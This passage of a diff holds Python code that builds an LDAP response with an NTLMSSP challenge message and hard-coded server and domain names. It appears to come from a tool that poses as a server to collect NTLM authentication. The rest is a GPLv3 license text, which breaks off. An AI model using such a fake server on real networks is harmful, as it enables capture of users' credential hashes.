("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
|
|
||||||
("NTLMSSPNtWorkstationName","SMB12"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairsUnicodeStr","smb12"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SERVER2008"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","smb12.local"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SERVER2008.smb12.local"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","smb12.local"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
|
|
||||||
("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
|
|
||||||
##Convert strings to Unicode first...
|
|
||||||
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
|
|
||||||
|
|
||||||
###### Workstation Offset
|
|
||||||
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
|
||||||
|
|
||||||
###### AvPairs Offset
|
|
||||||
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
||||||
|
|
||||||
###### LDAP Packet Len
|
|
||||||
CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
|
|
||||||
|
|
||||||
|
|
||||||
OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
|
|
||||||
|
|
||||||
NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
|
|
||||||
|
|
||||||
##### LDAP Len Calculation:
|
|
||||||
self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen))
|
|
||||||
self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen))
|
|
||||||
self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen))
|
|
||||||
|
|
||||||
##### Workstation Offset Calculation:
|
|
||||||
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
|
|
||||||
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
||||||
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
||||||
|
|
||||||
##### IvPairs Offset Calculation:
|
|
||||||
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
||||||
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
|
|
||||||
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
|
|
||||||
##### IvPair Calculation:
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
|
|
||||||
|
|
||||||
674
LICENSE
Normal file
674
LICENSE
Normal file
@@ -0,0 +1,674 @@
|
|||||||
|
GNU GENERAL PUBLIC LICENSE
|
||||||
|
Version 3, 29 June 2007
|
||||||
|
|
||||||
|
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
|
||||||
|
Everyone is permitted to copy and distribute verbatim copies
|
||||||
|
of this license document, but changing it is not allowed.
|
||||||
|
|
||||||
|
Preamble
|
||||||
|
|
||||||
|
The GNU General Public License is a free, copyleft license for
|
||||||
|
software and other kinds of works.
|
||||||
|
|
||||||
|
The licenses for most software and other practical works are designed
|
||||||
|
to take away your freedom to share and change the works. By contrast,
|
||||||
|
the GNU General Public License is intended to guarantee your freedom to
|
||||||
|
share and change all versions of a program--to make sure it remains free
|
||||||
|
software for all its users. We, the Free Software Foundation, use the
|
||||||
|
GNU General Public License for most of our software; it applies also to
|
||||||
|
any other work released this way by its authors. You can apply it to
|
||||||
|
your programs, too.
|
||||||
|
|
||||||
|
When we speak of free software, we are referring to freedom, not
|
||||||
|
price. Our General Public Licenses are designed to make sure that you
|
||||||
|
have the freedom to distribute copies of free software (and charge for
|
||||||
|
them if you wish), that you receive source code or can get it if you
|
||||||
|
want it, that you can change the software or use pieces of it in new
|
||||||
|
free programs, and that you know you can do these things.
|
||||||
|
|
||||||
|
To protect your rights, we need to prevent others from denying you
|
||||||
|
these rights or asking you to surrender the rights. Therefore, you have
|
||||||
|
certain responsibilities if you distribute copies of the software, or if
|
||||||
|
you modify it: responsibilities to respect the freedom of others.
|
||||||
|
|
||||||
|
For example, if you distribute copies of such a program, whether
|
||||||
|
gratis or for a fee, you must pass on to the recipients the same
|
||||||
|
freedoms that you received. You must make sure that they, too, receive
|
||||||
|
or can get the source code. And you must show them these terms so they
|
||||||
|
know their rights.
|
||||||
|
|
||||||
|
Developers that use the GNU GPL protect your rights with two steps:
|
||||||
|
(1) assert copyright on the software, and (2) offer you this License
|
||||||
|
giving you legal permission to copy, distribute and/or modify it.
|
||||||
|
|
||||||
|
For the developers' and authors' protection, the GPL clearly explains
|
||||||
|
that there is no warranty for this free software. For both users' and
|
||||||
|
authors' sake, the GPL requires that modified versions be marked as
|
||||||
|
changed, so that their problems will not be attributed erroneously to
|
||||||
|
authors of previous versions.
|
||||||
|
|
||||||
|
Some devices are designed to deny users access to install or run
|
||||||
|
modified versions of the software inside them, although the manufacturer
|
||||||
|
can do so. This is fundamentally incompatible with the aim of
|
||||||
|
protecting users' freedom to change the software. The systematic
|
||||||
|
pattern of such abuse occurs in the area of products for individuals to
|
||||||
|
use, which is precisely where it is most unacceptable. Therefore, we
|
||||||
|
have designed this version of the GPL to prohibit the practice for those
|
||||||
|
products. If such problems arise substantially in other domains, we
|
||||||
|
stand ready to extend this provision to those domains in future versions
|
||||||
|
of the GPL, as needed to protect the freedom of users.
|
||||||
|
|
||||||
|
Finally, every program is threatened constantly by software patents.
|
||||||
|
States should not allow patents to restrict development and use of
|
||||||
|
software on general-purpose computers, but in those that do, we wish to
|
||||||
|
avoid the special danger that patents applied to a free program could
|
||||||
|
make it effectively proprietary. To prevent this, the GPL assures that
|
||||||
|
patents cannot be used to render the program non-free.
|
||||||
|
|
||||||
|
The precise terms and conditions for copying, distribution and
|
||||||
|
modification follow.
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
0. Definitions.
|
||||||
|
|
||||||
|
"This License" refers to version 3 of the GNU General Public License.
|
||||||
|
|
||||||
|
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||||
|
works, such as semiconductor masks.
|
||||||
|
|
||||||
|
"The Program" refers to any copyrightable work licensed under this
|
||||||
|
License. Each licensee is addressed as "you". "Licensees" and
|
||||||
|
"recipients" may be individuals or organizations.
|
||||||
|
|
||||||
|
To "modify" a work means to copy from or adapt all or part of the work
|
||||||
|
in a fashion requiring copyright permission, other than the making of an
|
||||||
|
exact copy. The resulting work is called a "modified version" of the
|
||||||
|
earlier work or a work "based on" the earlier work.
|
||||||
|
|
||||||
|
A "covered work" means either the unmodified Program or a work based
|
||||||
|
on the Program.
|
||||||
|
|
||||||
|
To "propagate" a work means to do anything with it that, without
|
||||||
|
permission, would make you directly or secondarily liable for
|
||||||
|
infringement under applicable copyright law, except executing it on a
|
||||||
|
computer or modifying a private copy. Propagation includes copying,
|
||||||
|
distribution (with or without modification), making available to the
|
||||||
|
public, and in some countries other activities as well.
|
||||||
|
|
||||||
|
To "convey" a work means any kind of propagation that enables other
|
||||||
|
parties to make or receive copies. Mere interaction with a user through
|
||||||
|
a computer network, with no transfer of a copy, is not conveying.
|
||||||
|
|
||||||
|
An interactive user interface displays "Appropriate Legal Notices"
|
||||||
|
to the extent that it includes a convenient and prominently visible
|
||||||
|
feature that (1) displays an appropriate copyright notice, and (2)
|
||||||
|
tells the user that there is no warranty for the work (except to the
|
||||||
|
extent that warranties are provided), that licensees may convey the
|
||||||
|
work under this License, and how to view a copy of this License. If
|
||||||
|
the interface presents a list of user commands or options, such as a
|
||||||
|
menu, a prominent item in the list meets this criterion.
|
||||||
|
|
||||||
|
1. Source Code.
|
||||||
|
|
||||||
|
The "source code" for a work means the preferred form of the work
|
||||||
|
for making modifications to it. "Object code" means any non-source
|
||||||
|
form of a work.
|
||||||
|
|
||||||
|
A "Standard Interface" means an interface that either is an official
|
||||||
|
standard defined by a recognized standards body, or, in the case of
|
||||||
|
interfaces specified for a particular programming language, one that
|
||||||
|
is widely used among developers working in that language.
|
||||||
|
|
||||||
|
The "System Libraries" of an executable work include anything, other
|
||||||
|
than the work as a whole, that (a) is included in the normal form of
|
||||||
|
packaging a Major Component, but which is not part of that Major
|
||||||
|
Component, and (b) serves only to enable use of the work with that
|
||||||
|
Major Component, or to implement a Standard Interface for which an
|
||||||
|
implementation is available to the public in source code form. A
|
||||||
|
"Major Component", in this context, means a major essential component
|
||||||
|
(kernel, window system, and so on) of the specific operating system
|
||||||
|
(if any) on which the executable work runs, or a compiler used to
|
||||||
|
produce the work, or an object code interpreter used to run it.
|
||||||
|
|
||||||
|
The "Corresponding Source" for a work in object code form means all
|
||||||
|
the source code needed to generate, install, and (for an executable
|
||||||
|
work) run the object code and to modify the work, including scripts to
|
||||||
|
control those activities. However, it does not include the work's
|
||||||
|
System Libraries, or general-purpose tools or generally available free
|
||||||
|
programs which are used unmodified in performing those activities but
|
||||||
|
which are not part of the work. For example, Corresponding Source
|
||||||
|
includes interface definition files associated with source files for
|
||||||
|
the work, and the source code for shared libraries and dynamically
|
||||||
|
linked subprograms that the work is specifically designed to require,
|
||||||
|
such as by intimate data communication or control flow between those
|
||||||
|
subprograms and other parts of the work.
|
||||||
|
|
||||||
|
The Corresponding Source need not include anything that users
|
||||||
|
can regenerate automatically from other parts of the Corresponding
|
||||||
|
Source.
|
||||||
|
|
||||||
|
The Corresponding Source for a work in source code form is that
|
||||||
|
same work.
|
||||||
|
|
||||||
|
2. Basic Permissions.
|
||||||
|
|
||||||
|
All rights granted under this License are granted for the term of
|
||||||
|
copyright on the Program, and are irrevocable provided the stated
|
||||||
|
conditions are met. This License explicitly affirms your unlimited
|
||||||
|
permission to run the unmodified Program. The output from running a
|
||||||
|
covered work is covered by this License only if the output, given its
|
||||||
|
content, constitutes a covered work. This License acknowledges your
|
||||||
|
rights of fair use or other equivalent, as provided by copyright law.
|
||||||
|
|
||||||
|
You may make, run and propagate covered works that you do not
|
||||||
|
convey, without conditions so long as your license otherwise remains
|
||||||
|
in force. You may convey covered works to others for the sole purpose
|
||||||
|
of having them make modifications exclusively for you, or provide you
|
||||||
|
with facilities for running those works, provided that you comply with
|
||||||
|
the terms of this License in conveying all material for which you do
|
||||||
|
not control copyright. Those thus making or running the covered works
|
||||||
|
for you must do so exclusively on your behalf, under your direction
|
||||||
|
and control, on terms that prohibit them from making any copies of
|
||||||
|
your copyrighted material outside their relationship with you.
|
||||||
|
|
||||||
|
Conveying under any other circumstances is permitted solely under
|
||||||
|
the conditions stated below. Sublicensing is not allowed; section 10
|
||||||
|
makes it unnecessary.
|
||||||
|
|
||||||
|
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||||
|
|
||||||
|
No covered work shall be deemed part of an effective technological
|
||||||
|
measure under any applicable law fulfilling obligations under article
|
||||||
|
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||||
|
similar laws prohibiting or restricting circumvention of such
|
||||||
|
measures.
|
||||||
|
|
||||||
|
When you convey a covered work, you waive any legal power to forbid
|
||||||
|
circumvention of technological measures to the extent such circumvention
|
||||||
|
is effected by exercising rights under this License with respect to
|
||||||
|
the covered work, and you disclaim any intention to limit operation or
|
||||||
|
modification of the work as a means of enforcing, against the work's
|
||||||
|
users, your or third parties' legal rights to forbid circumvention of
|
||||||
|
technological measures.
|
||||||
|
|
||||||
|
4. Conveying Verbatim Copies.
|
||||||
|
|
||||||
|
You may convey verbatim copies of the Program's source code as you
|
||||||
|
receive it, in any medium, provided that you conspicuously and
|
||||||
|
appropriately publish on each copy an appropriate copyright notice;
|
||||||
|
keep intact all notices stating that this License and any
|
||||||
|
non-permissive terms added in accord with section 7 apply to the code;
|
||||||
|
keep intact all notices of the absence of any warranty; and give all
|
||||||
|
recipients a copy of this License along with the Program.
|
||||||
|
|
||||||
|
You may charge any price or no price for each copy that you convey,
|
||||||
|
and you may offer support or warranty protection for a fee.
|
||||||
|
|
||||||
|
5. Conveying Modified Source Versions.
|
||||||
|
|
||||||
|
You may convey a work based on the Program, or the modifications to
|
||||||
|
produce it from the Program, in the form of source code under the
|
||||||
|
terms of section 4, provided that you also meet all of these conditions:
|
||||||
|
|
||||||
|
a) The work must carry prominent notices stating that you modified
|
||||||
|
it, and giving a relevant date.
|
||||||
|
|
||||||
|
b) The work must carry prominent notices stating that it is
|
||||||
|
released under this License and any conditions added under section
|
||||||
|
7. This requirement modifies the requirement in section 4 to
|
||||||
|
"keep intact all notices".
|
||||||
|
|
||||||
|
c) You must license the entire work, as a whole, under this
|
||||||
|
License to anyone who comes into possession of a copy. This
|
||||||
|
License will therefore apply, along with any applicable section 7
|
||||||
|
additional terms, to the whole of the work, and all its parts,
|
||||||
|
regardless of how they are packaged. This License gives no
|
||||||
|
permission to license the work in any other way, but it does not
|
||||||
|
invalidate such permission if you have separately received it.
|
||||||
|
|
||||||
|
d) If the work has interactive user interfaces, each must display
|
||||||
|
Appropriate Legal Notices; however, if the Program has interactive
|
||||||
|
interfaces that do not display Appropriate Legal Notices, your
|
||||||
|
work need not make them do so.
|
||||||
|
|
||||||
|
A compilation of a covered work with other separate and independent
|
||||||
|
works, which are not by their nature extensions of the covered work,
|
||||||
|
and which are not combined with it such as to form a larger program,
|
||||||
|
in or on a volume of a storage or distribution medium, is called an
|
||||||
|
"aggregate" if the compilation and its resulting copyright are not
|
||||||
|
used to limit the access or legal rights of the compilation's users
|
||||||
|
beyond what the individual works permit. Inclusion of a covered work
|
||||||
|
in an aggregate does not cause this License to apply to the other
|
||||||
|
parts of the aggregate.
|
||||||
|
|
||||||
|
6. Conveying Non-Source Forms.
|
||||||
|
|
||||||
|
You may convey a covered work in object code form under the terms
|
||||||
|
of sections 4 and 5, provided that you also convey the
|
||||||
|
machine-readable Corresponding Source under the terms of this License,
|
||||||
|
in one of these ways:
|
||||||
|
|
||||||
|
a) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by the
|
||||||
|
Corresponding Source fixed on a durable physical medium
|
||||||
|
customarily used for software interchange.
|
||||||
|
|
||||||
|
b) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by a
|
||||||
|
written offer, valid for at least three years and valid for as
|
||||||
|
long as you offer spare parts or customer support for that product
|
||||||
|
model, to give anyone who possesses the object code either (1) a
|
||||||
|
copy of the Corresponding Source for all the software in the
|
||||||
|
product that is covered by this License, on a durable physical
|
||||||
|
medium customarily used for software interchange, for a price no
|
||||||
|
more than your reasonable cost of physically performing this
|
||||||
|
conveying of source, or (2) access to copy the
|
||||||
|
Corresponding Source from a network server at no charge.
|
||||||
|
|
||||||
|
c) Convey individual copies of the object code with a copy of the
|
||||||
|
written offer to provide the Corresponding Source. This
|
||||||
|
alternative is allowed only occasionally and noncommercially, and
|
||||||
|
only if you received the object code with such an offer, in accord
|
||||||
|
with subsection 6b.
|
||||||
|
|
||||||
|
d) Convey the object code by offering access from a designated
|
||||||
|
place (gratis or for a charge), and offer equivalent access to the
|
||||||
|
Corresponding Source in the same way through the same place at no
|
||||||
|
further charge. You need not require recipients to copy the
|
||||||
|
Corresponding Source along with the object code. If the place to
|
||||||
|
copy the object code is a network server, the Corresponding Source
|
||||||
|
may be on a different server (operated by you or a third party)
|
||||||
|
that supports equivalent copying facilities, provided you maintain
|
||||||
|
clear directions next to the object code saying where to find the
|
||||||
|
Corresponding Source. Regardless of what server hosts the
|
||||||
|
Corresponding Source, you remain obligated to ensure that it is
|
||||||
|
available for as long as needed to satisfy these requirements.
|
||||||
|
|
||||||
|
e) Convey the object code using peer-to-peer transmission, provided
|
||||||
|
you inform other peers where the object code and Corresponding
|
||||||
|
Source of the work are being offered to the general public at no
|
||||||
|
charge under subsection 6d.
|
||||||
|
|
||||||
|
A separable portion of the object code, whose source code is excluded
|
||||||
|
from the Corresponding Source as a System Library, need not be
|
||||||
|
included in conveying the object code work.
|
||||||
|
|
||||||
|
A "User Product" is either (1) a "consumer product", which means any
|
||||||
|
tangible personal property which is normally used for personal, family,
|
||||||
|
or household purposes, or (2) anything designed or sold for incorporation
|
||||||
|
into a dwelling. In determining whether a product is a consumer product,
|
||||||
|
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||||
|
product received by a particular user, "normally used" refers to a
|
||||||
|
typical or common use of that class of product, regardless of the status
|
||||||
|
of the particular user or of the way in which the particular user
|
||||||
|
actually uses, or expects or is expected to use, the product. A product
|
||||||
|
is a consumer product regardless of whether the product has substantial
|
||||||
|
commercial, industrial or non-consumer uses, unless such uses represent
|
||||||
|
the only significant mode of use of the product.
|
||||||
|
|
||||||
|
"Installation Information" for a User Product means any methods,
|
||||||
|
procedures, authorization keys, or other information required to install
|
||||||
|
and execute modified versions of a covered work in that User Product from
|
||||||
|
a modified version of its Corresponding Source. The information must
|
||||||
|
suffice to ensure that the continued functioning of the modified object
|
||||||
|
code is in no case prevented or interfered with solely because
|
||||||
|
modification has been made.
|
||||||
|
|
||||||
|
If you convey an object code work under this section in, or with, or
|
||||||
|
specifically for use in, a User Product, and the conveying occurs as
|
||||||
|
part of a transaction in which the right of possession and use of the
|
||||||
|
User Product is transferred to the recipient in perpetuity or for a
|
||||||
|
fixed term (regardless of how the transaction is characterized), the
|
||||||
|
Corresponding Source conveyed under this section must be accompanied
|
||||||
|
by the Installation Information. But this requirement does not apply
|
||||||
|
if neither you nor any third party retains the ability to install
|
||||||
|
modified object code on the User Product (for example, the work has
|
||||||
|
been installed in ROM).
|
||||||
|
|
||||||
|
The requirement to provide Installation Information does not include a
|
||||||
|
requirement to continue to provide support service, warranty, or updates
|
||||||
|
for a work that has been modified or installed by the recipient, or for
|
||||||
|
the User Product in which it has been modified or installed. Access to a
|
||||||
|
network may be denied when the modification itself materially and
|
||||||
|
adversely affects the operation of the network or violates the rules and
|
||||||
|
protocols for communication across the network.
|
||||||
|
|
||||||
|
Corresponding Source conveyed, and Installation Information provided,
|
||||||
|
in accord with this section must be in a format that is publicly
|
||||||
|
documented (and with an implementation available to the public in
|
||||||
|
source code form), and must require no special password or key for
|
||||||
|
unpacking, reading or copying.
|
||||||
|
|
||||||
|
7. Additional Terms.
|
||||||
|
|
||||||
|
"Additional permissions" are terms that supplement the terms of this
|
||||||
|
License by making exceptions from one or more of its conditions.
|
||||||
|
Additional permissions that are applicable to the entire Program shall
|
||||||
|
be treated as though they were included in this License, to the extent
|
||||||
|
that they are valid under applicable law. If additional permissions
|
||||||
|
apply only to part of the Program, that part may be used separately
|
||||||
|
under those permissions, but the entire Program remains governed by
|
||||||
|
this License without regard to the additional permissions.
|
||||||
|
|
||||||
|
When you convey a copy of a covered work, you may at your option
|
||||||
|
remove any additional permissions from that copy, or from any part of
|
||||||
|
it. (Additional permissions may be written to require their own
|
||||||
|
removal in certain cases when you modify the work.) You may place
|
||||||
|
additional permissions on material, added by you to a covered work,
|
||||||
|
for which you have or can give appropriate copyright permission.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, for material you
|
||||||
|
add to a covered work, you may (if authorized by the copyright holders of
|
||||||
|
that material) supplement the terms of this License with terms:
|
||||||
|
|
||||||
|
a) Disclaiming warranty or limiting liability differently from the
|
||||||
|
terms of sections 15 and 16 of this License; or
|
||||||
|
|
||||||
|
b) Requiring preservation of specified reasonable legal notices or
|
||||||
|
author attributions in that material or in the Appropriate Legal
|
||||||
|
Notices displayed by works containing it; or
|
||||||
|
|
||||||
|
c) Prohibiting misrepresentation of the origin of that material, or
|
||||||
|
requiring that modified versions of such material be marked in
|
||||||
|
reasonable ways as different from the original version; or
|
||||||
|
|
||||||
|
d) Limiting the use for publicity purposes of names of licensors or
|
||||||
|
authors of the material; or
|
||||||
|
|
||||||
|
e) Declining to grant rights under trademark law for use of some
|
||||||
|
trade names, trademarks, or service marks; or
|
||||||
|
|
||||||
|
f) Requiring indemnification of licensors and authors of that
|
||||||
|
material by anyone who conveys the material (or modified versions of
|
||||||
|
it) with contractual assumptions of liability to the recipient, for
|
||||||
|
any liability that these contractual assumptions directly impose on
|
||||||
|
those licensors and authors.
|
||||||
|
|
||||||
|
All other non-permissive additional terms are considered "further
|
||||||
|
restrictions" within the meaning of section 10. If the Program as you
|
||||||
|
received it, or any part of it, contains a notice stating that it is
|
||||||
|
governed by this License along with a term that is a further
|
||||||
|
restriction, you may remove that term. If a license document contains
|
||||||
|
a further restriction but permits relicensing or conveying under this
|
||||||
|
License, you may add to a covered work material governed by the terms
|
||||||
|
of that license document, provided that the further restriction does
|
||||||
|
not survive such relicensing or conveying.
|
||||||
|
|
||||||
|
If you add terms to a covered work in accord with this section, you
|
||||||
|
must place, in the relevant source files, a statement of the
|
||||||
|
additional terms that apply to those files, or a notice indicating
|
||||||
|
where to find the applicable terms.
|
||||||
|
|
||||||
|
Additional terms, permissive or non-permissive, may be stated in the
|
||||||
|
form of a separately written license, or stated as exceptions;
|
||||||
|
the above requirements apply either way.
|
||||||
|
|
||||||
|
8. Termination.
|
||||||
|
|
||||||
|
You may not propagate or modify a covered work except as expressly
|
||||||
|
provided under this License. Any attempt otherwise to propagate or
|
||||||
|
modify it is void, and will automatically terminate your rights under
|
||||||
|
this License (including any patent licenses granted under the third
|
||||||
|
paragraph of section 11).
|
||||||
|
|
||||||
|
However, if you cease all violation of this License, then your
|
||||||
|
license from a particular copyright holder is reinstated (a)
|
||||||
|
provisionally, unless and until the copyright holder explicitly and
|
||||||
|
finally terminates your license, and (b) permanently, if the copyright
|
||||||
|
holder fails to notify you of the violation by some reasonable means
|
||||||
|
prior to 60 days after the cessation.
|
||||||
|
|
||||||
|
Moreover, your license from a particular copyright holder is
|
||||||
|
reinstated permanently if the copyright holder notifies you of the
|
||||||
|
violation by some reasonable means, this is the first time you have
|
||||||
|
received notice of violation of this License (for any work) from that
|
||||||
|
copyright holder, and you cure the violation prior to 30 days after
|
||||||
|
your receipt of the notice.
|
||||||
|
|
||||||
|
Termination of your rights under this section does not terminate the
|
||||||
|
licenses of parties who have received copies or rights from you under
|
||||||
|
this License. If your rights have been terminated and not permanently
|
||||||
|
reinstated, you do not qualify to receive new licenses for the same
|
||||||
|
material under section 10.
|
||||||
|
|
||||||
|
9. Acceptance Not Required for Having Copies.
|
||||||
|
|
||||||
|
You are not required to accept this License in order to receive or
|
||||||
|
run a copy of the Program. Ancillary propagation of a covered work
|
||||||
|
occurring solely as a consequence of using peer-to-peer transmission
|
||||||
|
to receive a copy likewise does not require acceptance. However,
|
||||||
|
nothing other than this License grants you permission to propagate or
|
||||||
|
modify any covered work. These actions infringe copyright if you do
|
||||||
|
not accept this License. Therefore, by modifying or propagating a
|
||||||
|
covered work, you indicate your acceptance of this License to do so.
|
||||||
|
|
||||||
|
10. Automatic Licensing of Downstream Recipients.
|
||||||
|
|
||||||
|
Each time you convey a covered work, the recipient automatically
|
||||||
|
receives a license from the original licensors, to run, modify and
|
||||||
|
propagate that work, subject to this License. You are not responsible
|
||||||
|
for enforcing compliance by third parties with this License.
|
||||||
|
|
||||||
|
An "entity transaction" is a transaction transferring control of an
|
||||||
|
organization, or substantially all assets of one, or subdividing an
|
||||||
|
organization, or merging organizations. If propagation of a covered
|
||||||
|
work results from an entity transaction, each party to that
|
||||||
|
transaction who receives a copy of the work also receives whatever
|
||||||
|
licenses to the work the party's predecessor in interest had or could
|
||||||
|
give under the previous paragraph, plus a right to possession of the
|
||||||
|
Corresponding Source of the work from the predecessor in interest, if
|
||||||
|
the predecessor has it or can get it with reasonable efforts.
|
||||||
|
|
||||||
|
You may not impose any further restrictions on the exercise of the
|
||||||
|
rights granted or affirmed under this License. For example, you may
|
||||||
|
not impose a license fee, royalty, or other charge for exercise of
|
||||||
|
rights granted under this License, and you may not initiate litigation
|
||||||
|
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
